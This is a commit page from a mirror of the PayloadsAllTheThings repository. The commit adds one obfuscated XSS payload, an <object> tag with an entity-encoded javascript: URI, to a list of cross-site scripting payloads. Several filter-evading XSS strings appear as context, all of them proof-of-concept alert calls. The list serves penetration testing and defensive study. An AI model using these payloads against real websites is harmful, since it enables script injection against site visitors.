ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-30 23:25:03 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added XSS <object> payload

Browse Source
This commit is contained in:
Lorenzo Grazian 2021-09-02 15:14:29 +02:00 committed by GitHub
parent 0f94adafe5
commit 7369ee28b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
XSS Injection/README.md
View File

@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
<script>\u0061lert('22')</script> <script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script> <script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
// Img payload // Img payload
<img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS');>